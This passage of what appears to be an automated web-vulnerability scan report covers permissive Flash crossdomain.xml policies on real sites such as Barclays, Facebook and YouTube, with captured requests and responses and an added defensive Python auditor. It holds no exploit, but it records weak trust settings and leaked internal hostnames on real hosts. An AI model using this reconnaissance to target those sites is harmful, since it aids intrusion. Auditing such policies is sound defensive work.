<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.36. http://topics.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: topics.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:20 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.37. http://video.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 23:08:19 GMT
Expires: Tue, 01 May 2012 23:08:19 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 51587

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

6.38. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Apr 2011 00:39:48 GMT
ETag: "20e0a-14a-4a14edca27d00"
Content-Type: application/xml
Date: Tue, 03 May 2011 10:21:50 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

6.39. http://www.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. The captured policy also sets permitted-cross-domain-policies="by-content-type", so additional policy files elsewhere on the host are honoured if they are served with the text/x-cross-domain-policy content type.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Tue, 03 May 2011 19:20:16 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Tue, 03 May 2011 13:33:53 GMT
Age: 216
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

6.40. http://www.barclays.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Three further points in the captured response are worth noting: permitted-cross-domain-policies is set to "all", so any other policy file on the host can widen access; every visible allow-access-from entry carries secure="false", which lets plain-HTTP origins on the listed domains use a policy served over HTTPS; and the list discloses internal naming (a host under a .lan suffix and an intranet staging host) that has no business in a public policy.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barclays.co.uk

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:37 GMT
Content-type: text/xml
Last-modified: Fri, 12 Feb 2010 13:25:25 GMT
Content-length: 2371
Etag: "943-4b7556c5"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*.mediaplex.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barc1978.121314.co.uk" secure="false"/>
...[SNIP]...
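Every finding in this section reduces to a handful of attributes in the policy file, and reading a 2 KB policy by eye is error-prone. The script below is added here as a worked example; it is not part of the XSS.CX report and not one of Burp's own checks. It parses a crossdomain.xml and emits one finding per pattern seen in the captures above: a wildcard domain, a bare "*", a secure="false" entry, a site-control of "all" or "by-content-type", a domain value that carries a path, and an internal-looking hostname. The two sample policies are constructed for the example (the .test hostnames are placeholders, not real hosts) and mirror the shape of the Barclays capture and of a tightened policy; the severity labels are the script's own, not Burp's.

```python
# Added example: audit a Flash crossdomain.xml for the patterns flagged in this report.
# Not taken from the scan output. Sample policies are constructed; .test hosts are placeholders.
from __future__ import annotations

import xml.etree.ElementTree as ET
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class PolicyFinding:
    severity: str  # "High", "Medium", "Low" or "Information" (this script's own scale)
    detail: str


# Suffixes that usually mean a non-public name has leaked into a public policy.
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")


def audit_crossdomain_policy(xml_text: str) -> list[PolicyFinding]:
    """Return one finding per risky or noteworthy directive in a policy file."""
    # ElementTree does not fetch the external DTD named in the DOCTYPE, so a captured
    # policy is parsed offline; the DOCTYPE line seen in the captures is harmless here.
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError(f"unexpected root element <{root.tag}>")

    findings: list[PolicyFinding] = []

    site_control = root.find("site-control")
    if site_control is not None:
        mode = site_control.get("permitted-cross-domain-policies", "")
        if mode == "all":
            findings.append(PolicyFinding(
                "Medium",
                'site-control "all": any policy file anywhere on the host can widen access, '
                "including one planted through an upload feature"))
        elif mode == "by-content-type":
            findings.append(PolicyFinding(
                "Information",
                'site-control "by-content-type": other policy files are honoured if served '
                "as text/x-cross-domain-policy"))

    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        secure = el.get("secure", "true").lower()  # Flash default is secure="true"
        if domain == "*":
            findings.append(PolicyFinding("High", 'domain="*": every origin gets two-way access'))
        elif "*" in domain:
            findings.append(PolicyFinding("Low", f"wildcard {domain}: every host matching it is trusted"))
        else:
            findings.append(PolicyFinding("Information", f"specific host {domain} is trusted"))
        if secure == "false":
            findings.append(PolicyFinding(
                "Low",
                f'secure="false" on {domain}: if this policy is served over HTTPS, '
                "plain-HTTP origins on that domain are trusted too"))
        if "/" in domain:
            findings.append(PolicyFinding(
                "Low", f"{domain} contains a path: not a valid host pattern, check what was intended"))
        if domain.endswith(INTERNAL_SUFFIXES) or ".intranet." in domain:
            findings.append(PolicyFinding(
                "Information", f"{domain} looks like an internal hostname disclosed in a public policy"))

    return findings


def severity_counts(findings: list[PolicyFinding]) -> dict[str, int]:
    """Tally findings by severity, e.g. {'Medium': 1, 'Low': 8, 'Information': 4}."""
    return dict(Counter(f.severity for f in findings))


# Constructed sample: same shape as the Barclays capture above (not a verbatim copy).
WEAK_POLICY = """\
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*.example-bank.test" secure="false"/>
  <allow-access-from domain="*.adnetwork.test" secure="false"/>
  <allow-access-from domain="cdn.example-bank.test" secure="false"/>
  <allow-access-from domain="stage.intranet.example-bank.test" secure="false"/>
  <allow-access-from domain="*.microsites.example-bank.test.lan" secure="false"/>
</cross-domain-policy>
"""

# Constructed sample: the tightened form (master-only, named hosts, secure left at default).
HARDENED_POLICY = """\
<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example-bank.test"/>
  <allow-access-from domain="cdn.example-bank.test"/>
</cross-domain-policy>
"""

if __name__ == "__main__":
    for label, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        results = audit_crossdomain_policy(policy)
        print(f"== {label}: {severity_counts(results)}")
        for f in results:
            print(f"  [{f.severity}] {f.detail}")
```

Run it against a policy fetched with the same GET /crossdomain.xml request shown in each finding. The secure="false" check only matters when the policy is served over HTTPS, so when auditing an HTTP-only host treat those entries as a configuration smell rather than an exposure; the site-control "all" and wildcard findings apply regardless of scheme.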

6.41. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.39.47
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.42. http://www.independent.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.independent.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:31 GMT
ETag: W/"238-1296203468000"
Last-Modified: Fri, 28 Jan 2011 08:31:08 GMT
Content-Type: application/xml
Content-Length: 238
Age: 216
Vary: Accept-Encoding,User-Agent
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

6.43. http://www.nbcuniversalstore.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbcuniversalstore.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 27 Aug 2010 19:49:19 GMT
ETag: "3f010a-eef-48ed36913edc0"
Content-Type: text/xml
Expires: Tue, 03 May 2011 13:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:53 GMT
Content-Length: 3823
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.abc.com" />
<allow-access-from domain="*.aestaging.com" />
<allow-access-from domain="*.aetn.com" />
<allow-access-from domain="*.aetv.com" />
<allow-access-from domain="*.agentc.com" />
<allow-access-from domain="*.aggregateknowledge.com" />
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="*.bcsfootball.org" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.bdbshop.com" />
<allow-access-from domain="*.bio.com" />
<allow-access-from domain="*.biography.com" />
<allow-access-from domain="*.blogspot.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsstore.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.cmt.com" />
<allow-access-from domain="*.comedycentral.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.deliveryagent.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.dotomi.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.feedburner.com" />
<allow-access-from domain="*.fox.com" />
<allow-access-from domain="*.foxsports.com" />
<allow-access-from domain="*.friendster.com" />
<allow-access-from domain="*.getfused.com" />
<allow-access-from domain="*.gifts.com" />
<allow-access-from domain="*.go.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.history.com" />
<allow-access-from domain="*.historychannel.com" />
<allow-access-from domain="*.hulu.com" />
<allow-access-from domain="*.hurley.com" />
<allow-access-from domain="*.jackassworld.com" />
<allow-access-from domain="*.marchex.com" />
<allow-access-from domain="*.marthastewart.com" />
<allow-access-from domain="*.marthastewartcrafts.com" />
<allow-access-from domain="*.marthastewartstore.com" />
<allow-access-from domain="*.mslo.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.mtv.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.nbcuniversalstore.com" />
<allow-access-from domain="*.performics.com" />
<allow-access-from domain="*.resultsdemo.com" />
<allow-access-from domain="*.resultspage.com" />
<allow-access-from domain="*.rockbandstore.com" />
<allow-access-from domain="*.seenon.com" />
<allow-access-from domain="*.seenonmtv.com" />
<allow-access-from domain="*.seenonstyle.com" />
<allow-access-from domain="*.shopthefilm.com" />
<allow-access-from domain="*.shopthescene.com" />
<allow-access-from domain="*.sparkart.com" />
<allow-access-from domain="*.tbs.com" />
<allow-access-from domain="*.thesimpsonsshop.com" />
<allow-access-from domain="*.tnt.tv" />
<allow-access-from domain="*.trafficleader.tv" />
<allow-access-from domain="*.tvloop.com" />
<allow-access-from domain="*.ufc.com" />
<allow-access-from domain="*.vh1.com" />
<allow-access-from domain="*.warnerbrosrecords.com" />
<allow-access-from domain="*.watercooler-inc.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.zedo.com" />
...[SNIP]...

6.44. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 06:29:07 GMT
ETag: "132-48f40ee6332c0"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.45. http://admin7.testandtarget.omniture.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin7.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin7.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 03 May 2011 13:15:18 GMT
Accept-Ranges: bytes
ETag: W/"313-1301702101000"
Connection: close
Last-Modified: Fri, 01 Apr 2011 23:55:01 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.46. http://advertising.microsoft.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.msn.com" />
<allow-access-from domain="images.video.msn.com" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

6.47. http://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Wed, 04 May 2011 02:45:55 GMT
Date: Tue, 03 May 2011 02:45:55 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 38074

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.48. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
H